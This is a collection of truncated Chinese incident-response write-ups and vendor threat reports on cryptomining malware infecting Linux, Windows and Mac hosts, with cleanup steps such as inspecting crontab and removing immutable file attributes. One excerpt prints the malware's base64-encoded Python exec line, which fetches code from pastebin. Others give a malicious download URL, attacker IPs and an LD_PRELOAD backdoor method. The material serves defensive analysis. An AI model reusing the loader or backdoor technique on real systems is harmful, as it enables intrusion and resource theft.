公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助. 现象 top 命令查看,显示 CPU 占用 100%,进程名无明显规则,如:TzBeq3AM. 进程有时候会被隐藏,通过分析脚本删除部分依赖文件,可以显示出来. 存在可疑的 python 进程. crontab 被写入了一个定时任务,每半小时左右会从 pastebin 上下载脚本并且执行. 原因 redis 没有启用密码认证. 清理方案 将 redis…

昨天一朋友的公司服务器中了挖矿病毒,一起帮忙查看并做下记录.   病毒信息 名称:kworkerds 目录:/tmp/ 关键点:文件 -i 属性   i :这个i可就很厉害了.它可以让一个文件“不能被删除.改名,设置连接也无法写入或添加据.” 对于系统安全性有相当大的 帮助.只有root能设置此属性. 通常系统管理员有能力判断这个文件是否可以被删除.参考 :chattr -i root 也没办法随意删除   执行chattr -i thisxxs去掉i属性   crontab -l */ * *…

云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满的进程 cpu占用率 100%, 用top 查看cpu100 2.杀死进程 kill -9  pid 杀死进程后,过一分钟该进程又起来了 或者 删掉此进程 cpu还是 100% 3.估计是进程被隐藏了或者有守护进程 直接杀死不生效. 4.定时任务多了一个执行任务 crontab -l  发现有定时任…

背景 最近在应急中发现了一款Mac上的挖矿木马,目标是挖门罗币,经过走访,受害用户都有从苹果电脑上安装第三方dmg的经历(其中可以确定一款LOL Mac私服安装app会导致该木马),怀疑在网上很多第三方dmg都是携带了相关恶意程序的. 现象 根据用户反映中招用户一般会有以下几个症状: CPU占有率高 系统卡顿 活动监视器打不开 电脑过热 木马 感染 经过简要分析,怀疑该木马源起于第三方安装包,在解压安装过程中,生成了一个伪装成11.png(名字可以变)的恶意文件和com.apple.Yahoo.…

背景 近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件. 值得注意的是,这一攻击开始的时间(2月24日),与2月5日上述产品的母公司发布漏洞公告,相隔仅仅半个多月,再次印证了“漏洞从曝光到被黑产用于挖矿的时间越来越短”.此外,攻击者还利用了Supervisord, ThinkPHP等产品的漏洞进行攻击. 本文分析了该木马的内部结构和传播方式,并就如何清理.预防类似挖矿木…

简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件.除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐患. 由于攻击者直接复制了Jenkins系列漏洞发现者(Orange.tw)在博客上公布的poc,攻击payload含有"Orange.tw"字样,可能被误认为是漏洞发现者在进行测试,因此我们将木马命名为ImposterMiner(冒充者). 本次事件具有两个特点:一是ImposterMi…

问题现象 Linux 服务器收到报警信息,主机 CPU 跑满. 自动创建运行 Docker 容器 xmrig, 导致其他运行中容器被迫停止. 问题原因 通过 top 命令可以看到有一个 xmrig 进程占用了99%的 CPU. 经定位,该进程是一个挖矿木马程序,通过上述截图可以看到进程对应的 PID 为 2647,根据进程 ID 查询一下产生进程的程序路径: ll /proc/2647/exe 查看进程: 尝试处理 首先停掉该 Docker 容器,并删除其对应镜像. 1. 查看计划任务 Linu…

最近遇到一台confluence wiki主机被挖矿,收到CPU 告警异常之后,登录查看,进行分析. top c 命令查看,果然CPU 已经资源已经被吃完了.. 看到用户是confluence,100%的肯定是confluence的RCE漏洞导致的,因为大部门的使用这个软件的都是破解版本,官方的补丁都是针对付费用户的. 具体漏洞细节: https://github.com/jas502n/CVE-2019-3396 漏洞利用RCE:   处理过程: 1. 先封掉外网HTTP 端口,后续业务走VP…

线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序.突然一则噩耗从前线传来:网站不能访问了. 此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接被killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果.机制的我打了个top,出现以下内容: 这是谁运行的程序?不管三七二十一先杀掉再说,因为它就是Tomcat等程序启动不了的元凶.然而并没有什么卵用,过一会再看那个东西又跑出来占…

1.top查看资源使用情况 看到这些进程一直在变化,但是,主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程 2.排查kswapd0进程 执行命令netstat -antlp | grep kswapd0 查询该进程的网络信息 netstat -antlp | grep 194.36.190.30 发现只有这一个进程(当然,很有可能还会有其他进程) 3.查找进程的详细信息 我们来到/proc/目录下查找对应的pid号,即/proc/497.可以在这目录下…

背景 某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞,可以直接GetShell.出于做安全的谨慎,马上出现场应急,确认漏洞.该漏洞存在在cookie字段中的rememberMe字段中,可以RCE 漏洞应急 来到现场后,发现已经升级了,漏洞确认修复完成,只能查看以前的攻击痕迹. 查看账号情况 首先查看账户文件/etc/passwd,修改时间和内容没有什么问题 stat /etc/passwd cat /etc/passwd 查看文件情况 查看最近修改过的文件没看到特殊异常 ls…

0×00 背景概述 近日,同伴的一台Linux服务器中了kworkerds挖矿程序,随即对挖矿程序进行了处理与分析. 0×01服务器现状 进入服务器之后通过top命令,没有发现有占用CPU资源过高的进程,随后使用busybox top命令查看发现一个kworkerds的程序占用CPU资源达到了99%,计划任务中被写入恶意下载命令: 系统top命令界面: 使用busybox top命令界面: 写入的计划任务: 0×02脚本分析: 1)  mr.sh脚本: 清理文件或其他挖矿程序: 值得一提的是,脚…

近日,阿里云安全团队发现8220挖矿团伙为了更持久的驻留主机以获得最大收益,开始使用rootkit技术来进行自我隐藏.这类隐藏技术的使用在watchdogs等挖矿蠕虫使用后开始出现逐渐扩散和进化的趋势,此后预计主机侧的隐藏和对抗将成为主流. 背景 阿里云安全团队蠕虫监控平台发现8220挖矿团伙的下载脚本出现更新,除了下载必要的驻留脚本.挖矿程序之外,新增加了一个 so文件的下载地址:http://107.174.47.156/1.so. 8220挖矿团伙是一个长期活跃的利用多个漏洞进行攻击和部署…

0x01 攻击方式 利用的是通用漏洞入侵服务器并获得相关权限,从而植入挖矿程序再进行隐藏. 通过对脚本的分析,发现黑客主要是利用 Redis未授权访问漏洞进行入侵.脚本里有个python函数. import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2VSa3JTUWZFJwp0cnk6…

御界预警:3700余台SQL服务器被入侵挖矿 或导致严重信息泄露事件 https://zhuanlan.kanxue.com/article-8292.htm sqlserver的弱密码破解和提权攻击. 概述 本周腾讯安全应急响应中心接到客户求助,客户部署的腾讯御界高级威胁检测系统发现系统失陷感知信息,该公司安全管理人员及时联络腾讯安全专家协助分析威胁来源. 腾讯御界报告系统攻陷警报 腾讯安全工程师在征得客户同意后对客户机器进行远程取证,结合御界的关键日志,我们发现这是一起针对SQL Serve…

父进程名称: crond 进程名称: bash 进程路径: /usr/bin/bash 进程id: 20,517 命令行参数: /bin/sh /etc/cron.hourly/cron.sh 事件说明: XORDDoS木马入侵后,会在Linux的定时任务中植入恶意代码,定时启动后门程序,当发现该可疑进程时,很可能您的机器已经处于被入侵或者恶意发包的状态,建议您及时清理contab以及自启动项.帮助文档:https://help.aliyun.com/knowledge_detail/36279…

第一步:发现告警 Suricata发现特征字符串jsonrpc,这个是匹配挖矿木马的一个重要特征.于是开始分析告警信息: 告警中可以提取出的有效信息如下: 目标IP:149.28.199.108 目标IP:443 其他的有效信息,几乎无. 第二步:定位受害者 根据受害者的源IP定位到了接入层交换机接口假设为GE1/0/21,根据跳线架寻找工位定位到一台Windows笔记本电脑. 第三步:艰难排查 定位大法一:寻找已知的挖矿木马 开启对应的路径例如 C:\Windows\ C:\Windows\s…

前言 从2013年的诞生,到2016爆发,挖矿(MiningCryptocurrency) 的高回报率,使其成为了一把双刃剑.据外媒去年的统计,比特币的算力(Hash Rate)已在半年内翻了一翻. 当比特币全网算力已经全面进入P算力时代,也就意味着需要有相应计算能力的设备高速运转,不间断地暴力验证和工作,来支撑矿工们的“野心”. 自2017年11月以来,阿里云安全监控中心成功捕获到一系列的同源挖矿事件,被感染的主机中发现了名为F-Scrack-Jexboss的恶意文件,用于执行挖矿任务,并对外…

欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 一.背景情况 5月5日腾讯云安全曾针对攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警,在预警的前后我们曾多次捕获相关的攻击案例,其中就包含利用该问题进行挖矿,我们针对其中一个案例进行分析并提供响应的安全建议和解决方案. 二. 漏洞说明 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管…

Mac遇到挖矿程序应急的方法 工作笔记:   1.起因:监控发现jsonrpc挖矿报警,询问当事人描述当时情况是安装了sketch软件.   网上可以定位到该IOC   运行后该IOC流量依然可以观测到:  2.分析:安装当事人发来的iflymac.dmg文件,首先会打开lauch-installer安装程序,通过运行专用下载器执行script文件,文件利用curl下载sketch. AutoCAD.Betterzip.Moveist等常用mac os软件其中之一,根据传参来判断.下载完会运行x…

注:以下所有操作均在CentOS 7.2 x86_64位系统下完成. 今天突然收到“阿里云”的告警短信: 尊敬的****:云盾云安全中心检测到您的服务器:*.*.*.*(app)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警查看事件详情,并根据事件建议的方案进行处理. 于是登上“云盾云安全中心”查看,发现安全提示: 点进去查看详细信息: 网上查了下,发现这是一款在Linux/Windows双平台的挖矿病毒木马,该木马是通过Redis漏洞传播的挖矿木马DDG的变种,使用Go…

概述 近日,阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击,攻击成功后会下载门罗币挖矿程序进行牟利.该挖矿程序会大肆抢占服务器CPU资源进行门罗币的挖掘,造成服务器卡顿,严重影响正常业务运行,甚至造成业务终端.关于该蠕虫最早曝光于2018年7月,蠕虫自出现后频繁更新,陆续加入多达数十种的的攻击方式,可以预计该黑客团伙将会不断的寻找新的攻击方式来植入其恶意程序.建议用户及时排查自身主机是否…

近日,阿里云安全发现一种新型挖矿蠕虫RDPMiner,通过爆破Windows Server 3389端口RDP服务的方式进行挖矿木马传播,致使用户CPU占用率暴涨,机器卡顿,更被创建名为DefaultAccount的账号.攻击者可畅通无阻远程登录机器威胁用户业务和数据安全. 据该蠕虫连接的某矿池公布的HashRate,预估仅该矿池即有2000+机器连接进行挖矿,阿里云安全专家判断该挖矿蠕虫扩散性还在持续且活跃度高,且用户管理账号弱密码设置更给攻击者创造了有利的条件. 本文以RDPMiner整体攻…

近日,阿里云安全团队发布了<2018年云上挖矿分析报告>.该报告以阿里云2018年的攻防数据为基础,对恶意挖矿态势进行了分析,并为个人和企业提出了合理的安全防护建议. 报告指出,尽管加密货币的价格在2018年经历了暴跌,但挖矿仍是网络黑产团伙在入侵服务器之后最直接的变现手段,越来越多的0-Day/N-Day漏洞在公布后的极短时间内就被用于入侵挖矿,黑产团伙利用漏洞发起攻击进行挖矿的趋势仍将持续. 以下是报告部分内容,下载报告完整版:https://yq.aliyun.com/download/…

现在比特币的价格涨得很高,所以现在有黑客专门制造挖矿木马来诱导网友,从而达到控制电脑上的显卡来挖掘比特币.为什么木马要控制电脑中的显卡呢?因为显卡挖掘虚拟货币比特币的效率远比 CPU 要高.如果你是一位 3D 游戏玩家,正好中了比特币挖矿木马,就会发现在玩游戏时会非常卡顿. 那么,跟我们今天提到的挖矿minerd进程又有何关系呢? 发现问题 最近一台安装了Gitlab的服务器发生了高负载告警,Cpu使用情况如下: 让后登录到服务器,利用top查看CPU使用情况,这个叫minerd的程序消耗cpu…

因为我在工作的时候被各种挖矿病毒搞过几次,所以在这里整理下我遇到的病毒以及大神们的解决方案. 服务器中挖矿病毒后,最基本的一个特征就是CPU使用率瞬间飙升,此时可以通过top命令进行查看,确认是否有异常进程,当然有一些挖矿病毒稍微高级一些,比如pamdicks,它的进程是隐藏的,通过unhide命令…

没事整了一个1核2G的便宜服务器,虽说便宜吧,但是搞个博客网站啥的也还是够用了:但是呢,最近服务器过几天就会出先CPU占用率达到100%:系统完全卡死,项目请求一个都访问不了,或者就是超级长时间才能得到应答.一开始还没在意,重启一下服务器就好了,可经常出现,重启也难受啊!后来百度好久才知道可能是被黑了,所以就到处找问题,啥子定时任务,脚本,一个个的看,可以说,把服务器文件结构又熟悉了一遍,终于是找到了一堆垃圾文件,确定了是真的被黑了.其实我还是搞不懂,我这么小个服务器咋也被盯上了.最后通过下面这…

0x01 Linux 1. 预加载型动态链接库后门 inux操作系统的动态链接库在加载过程中,动态链接器会先读取LD_PRELOAD环境变量和默认配置文件/etc/ld.so.preload,并将读取到的动态链接库文件进行预加载,即使程序不依赖这些动态链接库,LD_PRELOAD环境变量和/etc/ld.so.preload配置文件中指定的动态链接库依然会被装载,因为它们的优先级比LD_LIBRARY_PATH环境变量所定义的链接库查找路径的文件优先级要高,所以能够提前于用户调用的动态库载入.这…

场景 按照一定时间规律运行Tcpdump 思路 编程思路细化思考 查看文件个数 file_count_results=`ls -al "C:\\Users\\Windows32\\Desktop\\test" | grep ^- | wc -l` 显示文件大小 $ du -h --max-depth=0 2.1G . $ du -bs 2177623726 . 这样的话,在SHELL里把文件夹大小做为命令输出赋值到一个变量里,但是用awk命令取第一列 CHECK=$(du -bs /d…

2018年Windows漏洞年度盘点丨老漏洞经久不衰,新0day层出不穷 腾讯电脑管家2019-02-12共17875人围观 ,发现 1 个不明物体网络安全资讯 https://www.freebuf.com/news/195195.html 前言 漏洞是影响网络安全的重要因素,而漏洞攻击作为恶意攻击的最常用手段,更是有着目标行业化.手段多样化的趋势,不论是个人还是企业,都面临着严峻的漏洞威胁. 2018年在轰动式的“幽灵”.“熔断”两大CPU漏洞中揭开序幕.“震网3漏洞利用挖矿”.“ 412挂…